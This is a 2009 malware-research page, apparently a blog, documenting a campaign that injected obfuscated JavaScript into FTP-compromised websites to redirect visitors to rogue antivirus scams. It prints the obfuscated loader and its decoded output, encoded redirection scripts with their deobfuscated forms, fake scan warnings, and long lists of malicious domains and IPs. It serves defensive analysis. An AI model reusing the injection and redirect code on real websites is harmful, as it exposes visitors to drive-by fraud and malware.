Web Poisoning: Massive malware attacks + iframe exploit - 2009

Web Poisoning - Massive SQL injections, XSS attacks, iframe and obfuscated javascript exploits from RBN Compromised websites are used to spread rogue antivirus like Antivirus360/2009/2010, MalwareDefender2009 etc... Banned by search engines, ranking destructed, unwanted popups/redirections... A new web based threat (drive-by installs) is currently spreading at a rate of about hundreds of site / day (may be more). Started in 2008, a higher number of detection in the end of 2008 December, more and more in March 2009. Higher detection: Above 1000 websites in 24hours 15000 detected (may be more) Websites affected: Number unknown Computer affected: 30 million Windows PCs (PandaSecurity) Number of variant: 7,000 variants of the type of malware over the last year alone In the wild: Yes First infection: July/August 2008 Latest infection found: 6 March, 2009 Related: Scammers making '$15m a month' on fake antivirus FakeAntivirus PandaSecurity HostExploit’s Cyber Crime Series Sinowal Trojan Sohos - Snickerdoodles and FakeAV ------------------------------------------------------------------------------------------------------------------- Spreading by FTP (stolen FTP password) this malware modifiy all index/main/intro pages by inserting obfuscated javascript code.
Sample of the malicious code inserted:
	function cniw(de,apyi){ if(!apyi){ apyi='=rmIqnV*C3MBpA8xSDGE6HTOoe-cQl&PiXjuYK4U k9NL2w1z+; h{7.RyZF(sfbWJ'; } var y; var OR=''; for(var dew=0;dew<de.length;dew+=4){ y=(apyi.indexOf(de.charAt(dew))&63)<<18| (apyi.indexOf(de.charAt(dew+1))&63)<<12| (apyi.indexOf(de.charAt(dew+2))&63)<<6| apyi.indexOf(de.charAt(dew+3))&63; OR+=String.fromCharCode((y&16711680)>>16, (y&65280)>>8,y&255); } eval(OR.substring(0,OR.length-3)); } cniw('l4nhCVKjxTDzoyHweTF7 8RKjBUlh-ODKMmQfQRAh3h2U-Or7CV;Xc4l.oTlKxG3NoOeXQ RAh-Or7Cjr7&OrKxG37eOX7BR9Xl4n{oy39Q*SjxjQ98RKjBUlh -ODKMml4lTFulVKzcjrL-4;.MmKsCmQ98RKjBUlh-ODKMmlRoOCi cTXUem=bCISF8hQ98RKjBUlh-ODKMmlRoOCi-UXLCI7iMVDzoy HweTF7B4lKlqH2eT.KcUDm&6KYMm3ye4fjMGYs3hYs-TC1ly3 9lV6k3R9Z-hF{l*K2eGF+cyA9lVKzcj=bCm3XoUAzc*H7eGCs3h Ys-TC1ly39lV6k3R9Z-hF{l*K2eGFR-OA9o4K2-ODFCI7iCUe9QR KjcV6j8hQ98RKjBUlh-ODKMmlN&V21QyDFcV61lRKYlViixG=RpI ps3hYs-TC1ly39lV6k3R.keRSixG=;8m7hAj9w-VlYMuC.B{q2pG wN&V21QyDFcV61lRKYlVis3hYs-TC1ly39lV6k3R9Z-hF{l*K2eG F7cy=ixGrw-VlYM.+UQ*XQ3{2UMEw9ojFyQ4K7eGiU-UXLBUA 7&T;KB4;KeUSixGrw-VlYM.+UQ*XQ3{2UMEw9ojFyQ4K7eGiUP GQ98RKjBUlh-ODKMmlKl4n2Mn+U-R92lGi9OmQ98hQ98RKjBUlh -ODKMmQfByAuQjQL3RK+lIZUME2iCm==');
Result:
	var ai = document; ai.write('<scr' + 'ipt language="javascript" type="text/javascript">'); ai.write('function zp(){ '); ai.write('var zx = 49;'); ai.write('var vsr = (document.getElementById("sy"));'); ai.write('vsr.style.position = "absolute";'); ai.write('vsr.style.visibility = "visible";'); ai.write('vsr.style.width = 603;'); ai.write('zx = 18-26*zx*25/1,1+vsr.style.width;'); ai.write('vsr.style.top = zx+\'px\';'); ai.write('vsr.style.left = zx+\'px\';'); ai.write('}'); ai.write('eval(\'zp()\');'); ai.write('</scr' + 'ipt>');
	* This script will simply HIDE all bad links inserted. Normal visitor's will not see them
Analysis:
	Hundred or thousand of pages on legitimate domains were exploited having web pages added with keywords (porn, celebrities etc..) append to them as a means of attracting victims via search engine results
	differents html pages (random name - approx. 1000 uploaded by victim)       shar__ackson_xxx.html independent__escorts_derby.html chexxxader_fxxed-terri__summers.html allstar_strxx_poker.html mike_rowe_nxxxe__pics.html kexxxxxx__scene.html   under different folders (random name - 1 folder by victim)   bow-wzzzzzy azzn-caxxxxa-uxxirt men-women-bxxxilders naxxnxxe-gallery racxxl-star-amateur   The folder with the name below are used   _image/ _images/ _img/ _imgs/ etc...   (or inside a normal folder: backup, project etc...)   A complete site. index.html map.html rss.xml (RSS Feed with thousand of links pointing to the links on the victim site) Approximatively 1000 pages by site (victim) These page result in redirection to malicious websites: www.onlinedetect. com(Always active since 2008) Registrar: ONLINENIC, INC. http://private.dnsstuff.com/tools/whois.ch?domain=onlinedetect. com&email=on Almost 10-20 domain is created every day hxxp://QUICKSECURITYEXAMINEONLINE. COM (has served 3 days) http://www.webnames.ru/scripts/who.pl?domain= QUICKSECURITYEXAMINEONLINE. com hxxp://instantprotectionscan . com (has served 4 days) hxxp://wwwreadright . com hxxp://stabilityexaminesite . com hxxp://stabilitysolutionslook . com hxxp://QUICKRESPONSESAFETY . COM hxxp://onlinesafetyscan . com   Template used: *************************************************** All redirect to the same IP 94.247.3.3 (Zlkon. lv - Latvia) http://www.google. com/safebrowsing/diagnostic?site=94.247.3.3 --------------- Google safe browsing report ---------------------- Malicious software includes 9689 adware(s), 9166 trojan(s), 5085 scripting exploit(s). ohh sorry: just an update after 10 days. Malicious software includes 10695 trojan(s), 9689 adware(s), 5259 scripting exploit(s). Over the past 90 days, 94.247.3.0 appeared to function as an intermediary for the infection of 671 site(s) What happened when Google visited sites hosted on this network? Of the 318 site(s) we tested on this network over the past 90 days, 18 site(s) served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2009-03-14, and the last time suspicious content was found was on 2009-03-14. Has this network hosted sites acting as intermediaries for further malware distribution? Over the past 90 days, we found 18 (update: 13) site(s) on this network that appeared to function as intermediaries for the infection of 2565 (update: 2922) other site(s). Has this network hosted sites that have distributed malware? Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 117 site(s) (updated: 122) that infected 9272 (updated: 11243) other site(s). http://www.google. com/safebrowsing/diagnostic?site=AS:12553 ------------------------------------------------------------------------------------- Example of compromised website: http://sanstabous.[BLOCKED]com.ar http://sanstabous.[BLOCKED]com.ar/includes/common/_images/hawaii-asian-escort/ pierced-tounges-xxx.html http://grzes77.[BLOCKED]webd.pl http://grzes77.[BLOCKED]webd.pl/zdjecia/_images/teens-illustrated/index.html http://64.177.[BLOCKED]12.146 http://64.177.[BLOCKED]12.146/templates/_images/oily-cock-massage/ RSS Example: hxxp://64.177.[BLOCKED]12.146/templates/_images/oily-cock-massage/rss.xml Analysis below: http://wepawet.iseclab.org/view.php?hash=0b34948b0d01123e5cd 1caa0eb318ef5&t=1235086837&type=js Inside all these pages uploaded by BOTS contain a javascript (redirection) to onlinedetect. com or related sites (greatstabilitytraceonline. com) --------------- Similar code: (same attack)   window.location = encodeURI(" http://www.onlinedetect. com/in.cgi?6 &tsk=sept-task11-r200-id11-t11-3bpri-al2nd& type=l&seor ef=" + encodeURIComponent (document.referrer) + "&parameter=$keyword &se=$se&ur=1&HTTP_REFERER=" + encodeURIComponent(document.URL) + "&default_keyword=XXX"); and here: hxxp://members.lycos. co.uk/mozila/473.html <script language="javascript"> var scheme=5; var default_keyword=''; alert(unescape('%77%69%6E%64%6F%77%2E%6C% 6F%63%61%74%69%6F%6E%3D%22%68%74%74 %70%3A%2F%2F%74%72%61%66%66%62%6F% 78%2E%63%6F%6D%2F%69%6E%2E%63%67% 69%3F%22%2B%73%63%68%65%6D%65%2B%22 %26%73%65%6F%72%65%66%3D%22%2B%65% 6E%63%6F%64%65%55%52%49%43%6F%6D%70 %6F%6E%65%6E%74%28%64%6F%63%75%6D% 65%6E%74%2E%72%65%66%65%72%72%65%72 %29%2B%22%26%22%2B%22%70%61%72%61% 6D%65%74%65%72%3D%24%6B%65%79%77%6 F%72%64%26%6B%65%79%77%6F%72%64%3D %24%6B%65%79%77%6F%72%64%26%73%65% 3D%24%73%65%26%75%72%3D%31%26%48% 54%54%50%5F%52%45%46%45%52%45%52% 3D%22%2B%65%6E%63%6F%64%65%55%52% 49%43%6F%6D%70%6F%6E%65%6E%74%28% 64%6F%63%75%6D%65%6E%74%2E%55%52% 4C%29%2B%22%26%64%65%66%61%75%6C% 74%5F%6B%65%79%77%6F%72%64%3D%22% 2B%65%6E%63%6F%64%65%55%52%49%43% 6F%6D%70%6F%6E%65%6E%74%28%64%65% 66%61%75%6C%74%5F%6B%65%79%77%6F% 72%64%29%3B')); </script> Deobfuscated result: window.location="http://traffbox.com/in.cgi?"+ scheme+"&seoref="+encodeURIComponent(docu ment.referrer)+"&"+"parameter=$keyword&keyword =$keyword&se=$se&ur=1&HTTP_REFERER="+enco deURIComponent(document.URL)+"&default_ keyword="+encodeURIComponent(default_keyword); Result: traffbox. com/in.cgi?5 <html><head> <meta http-equiv="REFRESH" content="1; URL='http://gowayscan.com/?uid=12403'"> </head><body> document moved <a href="http://gowayscan. com/?uid=12403"> here</a> </body></html> Result: gowayscan. com/?uid=12403 Header location redirection hxxp://litescan4. com/?uid=12403 Date: tsk=aug-task3-r86-id57-t78-al2nd tsk=july-task18-r86-id52-t58-obo22j tsk=julyt20-r19-id54-obo-july11 tsk=sept-task9-r115-id25-t43-ale3nd tsk=id67-01dec08-r91 tsk=julyt20-r19-id54-obo-july11 wrk=julyt06-r19-id061-z-july29 wrk=augt06-r19-id85-z-aug18   Entering these string in Google reveal tons of sites (sql injections, xss attacks etc...) On these sites we can also see some bad links to Google Video **************************************** **************************************** **************************************** March UPDATE Following 0day33hours. com and onlinedetect. com redirect me to some new site promoting InternetAntivirusPro The domain list willl be published soon Here are a few of them, some are not used, some suspended etc... Some has this common message: Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC Windows is scanning your system for threats. The scanning is provided by our official partner Internet Antivirus Pro. Please refrain from closing the window until the scanning is finished. We highly recommend you to install the full version of Internet Antivirus Pro scanner to monitor your PC for threats and on-time security system updates. Please note that Spyware is highly malicious for your PC information privacy. If you want to install the full version, please click "Ok", wait for the page to load, start the installation process and follow the instructions. If you want to wait for scanning results to appear, please click "Cancel". After Internet Antivirus Pro is installed, you can close the scanning window and remove Spyware from your computer. Serious security and privacy threats found on your computer. It may damage your files or steal your personal and financial information. Click "OK" to start downloading CRITICAL security software update. Your computer is running slower than normal, maybe it is infected with Viruses, Adware or Spyware. RapidAntivirus will perform a quick and completely FREE scan of your system for malicious software. Download RapidAntivirus for FREE now!. (onlinescanweb. com) Some Title: My Computer My computer Online Scan Internet Security is important Internet Antivirus Pro: best protection for Your privacy Windows Security Center RapidAntivirus Virus Scan in Progress Some URLs: in.php hitin.php in.cgi?{3-6} (traffic management - avertlabs - Inside the malicious traffic) cki.php?uid=keyin ?uid=keyin {/22/?uid=keyin - /26/?uid=keyin} Some common files: /script_en.js /files/brand_constants.js /files/text_constants_en.js /files/this_landing.css /files/domFunction.js /files/startafter.js /files/mouse_block.js /files/unic_scripts.js /files/pre_load.css /common/destrub.js /common/stata.js /common/build/yahoo-dom-event/yahoo-dom-event.js /installinfo/3/style.css /nag/1/?uid=144&n=nag&install=1 /cki.php?uid=keyin /download/install.php Site Samples: HTML detected as: JS_FAKEALERT.AK One is detected as Mal_FakeAV6 Two are detected as HTML_FAKEAV.ALO destrub.js detected as JS_DLOADER.UGD JS_DLOADER.WJJ ********************* Template RapidAntivirus (hxxp://onlinescanweb. com) ********************* Template SystemSecurity (hxxp://systemsecurityline. com) ********************* File downloaded install.exe Detected as: Cryp_FakeAV-9 Cryp_FakeAV-10 Cryp_FakeAV-11 Different variants: TROJ_INTERNETA.K TROJ_AGENT.ANOE TROJ_FAKEAV.ALS TROJ_FAKEAV.AHJ TROJ_FAKEAV.BML TROJ_FAKALER.VO IAInstall.exe is detected as: TROJ_INTERNETA.H Alias: Winwebsecurity ********************* File downloaded SystemSecurity.exe or Setup.exe - VT Detected as: TROJ_AGENT.ANEM TROJ_FAKEAV.AND TROJ_RENOS.AVI
Some related domain: 69.64.33.242 Same template SystemSecurity     micro-ms-antivir. com     On the same server we also have otherfake av site Reverse IP: 135 other sites hosted on this server. CCLeaner Template and some other   2009system-cleaner. com advanced-anti-virus. com advanced-antivirus. com antimalwarewarrior2009. com antispyware-solutions. com antiviral-softtools. com antivirus-buy1. com antivirus-cs2. com antivirus-cs3. com antivirus-cs4. com antivirus-cs5. com antivirus-cs6. com antivirus-cs7. com antivirus-cs8. com antivirus-cs9. com antivirus-cs10. com antivirus-cs11. com antivirus-cs12. com antivirus-cs13. com antivirus-cs14. com antivirus-cs15. com antivirusmaster2009. com e-spy-punisher. com fight-viruses-corp. com kicks-mall. com kill-adware-soft. com killallspywares2009. com malware-preventer. com malware-remover2008. com micro-adware-cops. com micro-antivirus2008. com spy-cops-2009. com spy-re-mover. com spy-terminators. com spyware-remover-inc. com superantivirus2009. com sys-antispy2009. com vis-antispy2008. com windows-antispy2008. com     Watches   era-mall. com luxury-mall. com mypharmshop. com premium-watches. com watches-vendor. com multibrand-shop. com     Pharma   hq-pharmacy1. com hq-pharmacy2. com mypharmshop. com     eCommerce   web-checkout1. com     whois details show that"the domain owner" also have 24 other domains DNS Servers: NS1.AAA-NAMESERVER. com NS2.AAA-NAMESERVER. com
Domain used:
*********************************************** Domain served... Registrar: BIZCN. com, INC.     0day33hours. com moxnatko. com (SUSPENDED)   Registrar: REGTIME LTD. (webnames.ru)   ThreatExpert Taste AV - Google etc..         beststabilityscan. com Reports Symantec - VirusTotal dynamicstabilityexamine. com Report Reports Google - Google dynamicstabilityread. com   Reports Google - Google esnetscanonline.com   Reports Symantec fastdirectdownloadserver. com Report (Winweb Security) faststabilityexamine. com   Reports Google fuckmoneycash. com Report (IP: 209.44.126.14) greatstabilityscanonline. com     Google - FireEye greatstabilitytraceonline. com   Reports Google - Google instantsecurityscan. com Report Reports Google internetexamine. com     Symantec internetsecurityexamine. com   Reports   netsecurityonline. com     Mcafee networkstabilityexamine. com     Google - Symantec onlineprotectionscan. com     Google onlinesafetyscan. com     Google onlinesecuredownload. com Report     onlinestabilityscanada. com       onlinestabilityexamine. com       onlinestabilityguide. com   Reports   onlinestabilityscan. com       onlinestabilitysite. com       outsthehit. com Report     protectionread. com Report     quickresponsesafety. com     Google quicksecurityexamineonline. com       quickstabilityscan. com Report     quicksecurityskim. com Report     readysecurityscan. com     Google safetyexamine. com       safetyinternetscan. com       safetyonlinescan. com       safetyread. com       safetywwwscan. com       scansecurityonline. com       scanstabilityavailable. com       scanstabilityinternet. com       scanstabilityonline. com Report     scanworldonline. com       securewebscan. com       securithyonsite. com       stabilityscanweb. com Report     stabilitysolutionslook. com Report     stabilityskim. com       stabilitytraceweb. com Report     thestabilityinternetworld. com Report     safesoftwaretransfer. com Report     scansecurityonline. com Report     scanstabilityonline. com Report     scanusonline. com Report     scanworldguide. com Report     securecrtdownload. com Report     securefilecourier. com Report     securefileservices. com Report     secureshelldownload. com Report     securedownloaddirect. com Report     securedownloadsoftware. com Report     securetransferonline. com Report     securityonlineread. com     Symantec securityonlinescan. com       securityscanworld. com Report     serverfastdownload. com Report     stabilityaudit. com       stabilityscandirect. com   Reports   stabilityscanweb. com       stabilityexamineguide. com Report     stabilityexamineonline. com       stabilityexaminesite. com       stabilityinternetearthguide. com       stabilityinternetglobalonline. com     411-spyware stabilityinternetscan. com       stabilityinternetworld. com       stabilitynet. com       stabilityonline. com       stabilityonlinedirect. com       stabilityread. com       stabilityseeonline. com       stabilityscan. com     FireEye stabilityscandirect. com       stabilitysolutionslook. com     Symantec Google stabilitytrace. com       stabilitytraceonline. com Report     stabilitytraceweb. com       stabilityscanavailable. com   Report   stabilityscanonline. com       stabilityscanweb. com       superstabilityread. com     Mcafee systemsecurityonline. com Report - 2,3 Reports Symantec - McAfee swiftsafetyexamine. com       thesafedownload. com Report     thesecuredownload. com Report     thesecuretransfer. com Report     thestabilityscan. com       thestabilityweb. com       thestabilityinternetworld. com       websafetyscan. com       websecurityexamine. com       webprotectionswipe. com Report     webreadon. com Report     winwebsecurity. com Report     wwwexamine. com Report     wwwreadright. com       wwwsafeexamine. com       wwwsecurityexamine. com Report     wwwsecurityread.com       wwwstabilityscan. com       wwwmobilereads. com Report     yourstabilityscan. com                       Domain used for redirections: Previous IP Actual IP   69.41.182.12 92.62.101.122 acousticnail.cn     allradiohits. com     bankinggolf.cn     buyyourhomes. com     designroots.cn     drawingstyle.cn     housedomainname.cn     musicdomainer.cn     nicescores.cn     oceandealer.cn     partsocean.cn     peopleopera.cn     rainfinish.cn     travets.cn     vitamingood.cn     websiteflower.cn     worksean.cn     Registrar: PUBLICDOMAINREGISTRY.com       Some domain are using DNS below.       bestjetsblog. com (SUSPENDED)   buyyourhomes. com (SUSPENDED)   detectspywares.info (SUSPENDED)   extrasdiscount.net (SUSPENDED)   funbookclub.net (SUSPENDED)   hadjhadj.info (SUSPENDED)   goldmagicclub. com (SUSPENDED)   mediamiddle.net (SUSPENDED)   movieextrasworld. com (SUSPENDED)   providesite. com (SUSPENDED)   stocktradeshop.net (SUSPENDED)   theyourlife. com (SUSPENDED)   yourcollectorcar.net (SUSPENDED)         Sponsoring Registrar: 厦门华融盛世网络有限公司 Translated to:Xiamen Huarong Spirit Network Limited       Registration Service Provided By: VIVIDS MEDIA GMBH       findcommon. com         ---------------------------------------------------------------------- Domainused to analyse traffic from compromised website: (UPDATE: DNS Suspended - Site are not available - 69.41.182.12) (UPDATE: DNS Updated - Now moving to Starline in Estonia - 92.62.101.122) (UPDATE: Name Server:ns1.opa-opa-nixuya. net Name Server:ns2.opa-opa-nixuya. net Name Server:ns1.travets. cn Name Server:ns2.travets. cn ) vitamingood. cn (registered by REGTIME. LTD - hosted by webnames.ru) peopleopera.cn (registered by REGTIME. LTD - hosted by webnames.ru) nicescores.cn (registered by REGTIME. LTD - hosted by webnames.ru) buyyourhomes. com (registered by REGTIME. LTD - hosted by webnames.ru) using the following DNS: 69.41.182.12/69.41.182.13 (800hosting.net - US) UPDATE (DNS SUSPENDED) hxxp://ns1.bestjetsblog. com hxxp://ns1.extrasdiscount.net hxxp://movieextrasworld. com hxxp://NS1.FINDCOMMON. com Parked - SedoNS1.GOLDMAGICCLUB. com hxxp://NS1.MEDIAMIDDLE.NET hxxp://ns1.funbookclub.net hxxp://NS1.PROVIDESITE. com hxxp://NS1.STOCKTRADESHOP.NET hxxp://NS1.THEYOURLIFE. com hxxp://NS1.THECLUBGOLF.NET   94.247.3.3 ThreatExpert Symantec       internetsafetyskim.com     safetyexamine. com     securityscandirect. com     wwwsecurityread.com           hs.3-3.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON   94.247.3.41 ThreatExpert Symantec       avpaymentpro. com     cokiran. com     iavpaymentpro. com     go-scan-pro. com Report   gonewscan. com Report   goscanweb. com Report   gosscan. com     ia-payment-pro. com     ia-scanner-pro. com     ia-scannerpro. com     internet-antivirus-pro. com     livestopbadware. com     stased. com     mysscan. com     websscan. com       hs.3-41.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     94.249.3.40           fast-antimalware-scan. com Continue here   Netcraft   hs.3-40.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     94.247.3.42 ThreatExpert Symantec Virustotal         ia-payment. com       ia-scanpro. com       goscan-pro.com                 hs.3-42.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     94.247.3.74 ThreatExpert Symantec Virustotal         instantsecurityscanworld. com       thestabilityscan. com Report     yourstabilityscan. com Report     safetyscanworld.com Report     stabilityscandirect. com Report     webnetsafety.com Report     webstabilityscan. com Report Report Report         Netcraft   hs.3-74.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     94.247.2.84   Trend Micro       files.msas2009dl. com   TROJ_FAKEAV.AID     TROJ_FAKEAV.GDS     TROJ_DLOAD.PG     TROJ_FAKEAV.AIN addantivirus. com     antiviruscheckout. com           hs.2-84.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     94.247.2.133 ThreatExpert         int.msproreport1. com PE_VIRUT   int.msproreport2. com     Related: irc.zief.[blocked]pl           int.proreportms1. com WinSpywareProtect       ThreatExpert: rogueantispyware-winspywareprotect   hs.2-133.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     94.247.2.137   Trend Micro       hxxp://msantispyware2009. com   TROJ_FAKEAV.AID     TROJ_FAKEAV.GDS     TROJ_DLOAD.PG     TROJ_FAKEAV.AIN hxxp://addantivirus. com     hxxp://antispylinks. com     hxxp://antispylist. com     hxxp://antispyme. com     hxxp://antispypro. com   VirusTotal - Anubis hxxp://antispywareup. com     hxxp://antiviruscheckout. com     hxxp://antivirusup. com     hxxp://goldpcguard .com     hxxp://pcsecuretools. com           files.msas2009dl. com (94.247.2.84) setup_1.exe   TROJ_DLOAD.ML       hs.2-137.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     lol 94.247.2.215 Other AV       antivirus--plus.com     antivirus-plus-new. com     antivirusplus.biz     antivirusplus2009. com     antivirusplus2009. net     avplus2009. com     bestnetcheckonline. com VirusTotal   downloadantivirusplus. com ThreatExpert AntivirusPlus.exe VT easynetcheckonline Continue here internet-check. net     onlinescanweb. com   Symantec onlinewebscan. com     rapldhsare. com     security-check-center. com VirusTotal   traffchecking. com     www.antivirusplus2009. net Article         hs.2-215.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     ThreatExpert RogueAntiSpyware.System Security ThreatExpert's awareness of the file "systemsecurity.exe" 94.247.2.241 ThreatExpert AV       hxxp://int.ms-asreport1. com Report McAfee       Alias: MS AntiSpyware 2009 msas2009.exe Prevx   Related: hxxp://www.antispyme. com (64.191.12.38 - Netcraft)   Payment page: hxxp://sales.getpaymentform. com 94.247.2.42 Netcraft   hs.2-241.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON     64.191.12.38 ThreatExpert   Previous IP: 94.247.2.137           hxxp://addantivirus. com     hxxp://antispylinks. com   hxxp://antispylist. com     hxxp://antispyme. com     hxxp://antiviruscheckout. com     .............................     hxxp://pro-antispyware2009. com     hxxp://syscleanerpro. com     hxxp://systemcleanerpro. com     hxxp://system-cleanerpro. com     hxxp://totalantispyware. com Report   hxxp://totalantispyware. net     hxxp://totalantispyware2009. com           Listed at hpHosts           "Ms Antispyware 2009" source. Common download: hxxp://files.msas2009dl. com TROJ_DLOAD.ML Common payment page: hxxp://sales.getpaymentform. com       94.247.2.253 ThreatExpert         interinetskim. com Report         91.211.65.50 ThreatExpert AV       avscan7. com   McAfee - VirusTotal scan5new. com   McAfee - VirusTotal       Ural-NET Ural Industrial Limited Company Russia AP10609-RIPE uralnet.biz             ThreatExpert AV,Google,other 91.211.65.110     91.211.65.111           ns2.stabilityscanonline. com   FireEye stabilityscanonline. com             ThreatExpert AV,Google,other 91.211.64.173     91.211.64.174           ns1.stabilityscan. com   FireEye ns2.stabilityscan. com     stabilityscan. com             ThreatExpert AV 91.211.65.130           ns1.internetskim. com     ns1.stabilityinternetearthguide. com     greatstabilityscanonline. com   VirusTotal       91.211.65.131           ns2.internetskim. com     ns2.stabilityinternetearthguide. com           91.211.66.10           avscan7. com     ns2.avscan7. com     ns2.scan5new. com     scan5new. com           209.249.222.48           antiviralscanner14. com     easywinscanner17. com     privacyscanner15. com     sg9scanner. com     sg10scanner. com     sg11scanner. com     sg12scanner. com     sgviralscan. com           209.44.126.22 ThreatExpert         onlinestabilitysite.com     protectionskim.com Report   safetyscansite.com Report new stabilityaudit.com Report   yourstabilitysystem.com Report new       207.126.166.11           gomegascan.com           209.44.126.16                 onlinestabilityguide.com     onlinestabilitysite.com     onlinestabilityworld.com     systemsecurityonline.com   Symantec       207.126.166.21           scanlog6. com     scanmain6. com           207.126.166.22           basescan6. com     scanhome4. com     scangate6. com     gatescan6. com     homescan6. com     home6scan. com     everscan6. com     scan6now. com     scan6gate. com     scanhome6. com     scangate6. com     scanlead6. com           207.126.166.41           scanhome4. com     scanjust4. com           207.126.166.59           goeverscan. com     gojustscan. com     goleadscan. com     golinescan. com     gologscan. com     goscanhome. com     goscanjust. com     goscanlog. com     goscanmega. com     goscantool. com     goscanzoom. com     gotoolscan. com     gouserscan. com     scanever4. com     scan5best. com           207.126.166.83 x         gomegascan. com     goscanbay. com     goscanfuse. com     goscansafe. com     goscanuser. com     goscanway. com     gozoomscan. com     scan6ever. com     scan6gate. com     just6scan. com     justscan6. com     linescan6. com     scanbase6. com     leadscan6. com March 13   lead6scan. com           207.126.166.84           in6co. com     scan6home. com     scaneasy6. com     scanplus6. com           207.126.161.230           gogatescan. com     gohomescan. com     gojustscan. com           209.44.126.14 ThreatExpert         bestfiresfull. com     fuckmoneycash. com Report   getscanonline.com Report   mostpopularscan. com     scanvistanow. net     vistastabilitynow. com Report   worldnowhits. com           209.44.126.22 ThreatExpert             onlinestabilitysite. com       onlinestabilityworld. com Report     onlinestabilityguide. com Report             216.21.239.197           scan4life. com           62.193.202.6           in8co. com           65.55.39.12           plusscan6. com     scan6fast. com PARKED         66.101.58.54           easyscan6. com     fastscan6. com     gate6scan. com     gobasescan. com     igo5scan. com     goopenscan.com     goscangate. com     goscanmain. com     goscanplus. com     goscan5. com     scan6base. com     scan6lead.com     scan6line. com     zoomscan6. com           66.197.154.198           go4scan. com Analysis on March13         69.10.52.12           5scanav. com     scan5av. com     in5co. com     in5is. com     in5sk. com   VirusTotal live5scan. com     livescan4. com     livescan5. com     scan5plus. com           67.208.74.12 PARKED         scan6easy. com     scan6fast. com     scanbest6. com     scanlive6. com     scannew6. com           67.214.175.74           scan4user.com     scan4zoom. com Symantec Safe Web         67.214.161.149           mainscan6. com Symantec Safe Web         74.125.45.100           scanbase4. com     scangate4. com     scan6ever. com           72.232.186.18 TasteReports Anubis ThreatExpert         systemsecurityline. com Report Report Report - 2 - 3         78.129.166.225 ThreatExpert         scanaonline. com     stabilityonlinedirect. com     webprotectionread. com Report   wwwsafetyscan. com           78.129.4.41 Javascript Analysis         scanaonline. com Report         78.47.172.66           antivirus360-protection. com Analysis   protectionsoftwarecheck. com Analysis         fast-antimalware-scanner. com Robtex Alexa   Google Image nameservers used by this domain           ns1.basicstechnology. com ns2.basicstechnology. com ns3.basicstechnology. com Robtex Robtex Robtex         domains sharing nameservers under another name           antivirus-premium-scan.com antivirus360-protection.com eosads.com onlinetds.info powertds.ws privateinfoclick.com protection-fast-scanner.com safeinternetzone.com securedclickhere.com software-clicks.com Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex         advertisechoice.cn awardspacelooksbig.cn bestantimalwarelivescan. com bestantimalwarescanner. com falloutneferwin.cn fast-antimalware-pro-scan. com fastantimalwarelivescan. com fastantimalwareproscan. com fastantimalwareproscanner. com fastantimalwarescan. com Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex         ip numbers of nameservers           115.126.5.10 64.86.17.44 91.211.64.47 Robtex Robtex Robtex         other names of the nameservers           dns2.systempromns. com dns3.systempromns. com ns1.eguassembly. com ns1.europegigabyte. com ns1.fastfreetest.cn ns1.freehostns. com ns1.managehostdns. com ns1.singatours. com ns2.freefastdns. com ns3.eguassembly. com Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex Robtex         Antivirus360 source     78.157.143.184 Robtex     *.avproscan. com  a  78.157.143.184      78.157.128.0/19 SIA ULTRANET AS35057 ULTRANET AS UltraNet Ltd *.go-iascan. com  *.goscan-pro. com  *.goscanpc. com  *.ia-free-scanner. com  *.ia-payment-pro. com  *.ia-payment. com  *.ia-scanpro. com  *.iascan-pro. com  *.inspred. com  *.internet-antivirus-2008. com  *.stased. com  bestproscan.com go-scan-pro. com  gobestscan. com goscanpc. com goscan-pro. com  ia-payment-pro. com  ia-payment. com  ia-scanpro. com  iabestscan.com iascan-pro. com  iascanner-pro. com  iascannerpro. com  inspred. com  internet-antivirus-2008. com  internet-antivirus-pro. com  mail.gobestscan. com  mail.goscan-pro. com  mail.ia-payment-pro. com  mail.ia-payment. com  mail.ia-scanpro. com  mail.iascan-pro. com  mail.iascanner-pro. com  mail.iascannerpro. com  mail.inspred. com  mail.internet-antivirus-2008. com  mail.internet-antivirus-pro. com  mail.stased. com  mail.wa-payment. com  ns.goscan-pro. com  ns.ia-payment. com  ns.ia-scanpro. com  ns.iascan-pro. com  ns.inspred. com  ns.internet-antivirus-2008. com  ns.stased. com  ns.wa-payment. com  ns1.avmyscan. com  ns1.avproinstall. com  ns1.avproscan. com  ns1.avprostat. com  ns1.avscanpro. com  ns1.go-your-scan. com  ns1.gobestscan. com  ns1.gomyscan. com  ns1.goyourscan. com  ns1.ia-download. com  ns1.ia-payment-pro. com  ns1.ia-payment. com  ns1.ia-scanpro. com  ns1.iascan-pro. com  ns1.iascanner-pro. com  ns1.iascannerpro. com  ns1.inspred. com  ns1.internet-antivirus-pro. com  ns1.scanavpro. com  ns1.stased. com  ns1.wa-payment. com  ns2.go-iascan. com  ns2.goscan-pro. com  ns2.goscanpc. com  ns2.ia-free-scanner. com  ns2.ia-scanner-pc. com  ns2.iascanner-pro. com  ns2.internet-antivirus-2008. com  ns2.wa-payment. com  ns3.ia-payment-pro. com  ns3.ia-payment. com  ns3.wa-payment. com  stased. com  wa-payment. com  www.stased. com  cname  stased. com go-iascan. com avproscan. com ia-free-scanner. com goscanpc. com avprostat. com Robtex avmyscan. com go-your-scan. com goyourscan. com ia-scanner-pc. com       78.159.100.22           line4scan. com     log4scan. com           78.159.101.11           megascan4. com     safe4scan. com     scanmain4. com           78.159.101.22           homescan4. com     justscan4. com     leadscan4. com     now4scan. com     scan4tool. com     tool4scan. com           78.159.101.27           any4scan.com March 19 new! Wepapet (Redirection) anyscan4. com March 17 new! VirusTotal - Anubis base4scan. com     data4scan.com March 19 new!   datascan4. com March 17 new! VirusTotal - Anubis scan4zoom. com     in4ik. com   VirusTotal in4is. com     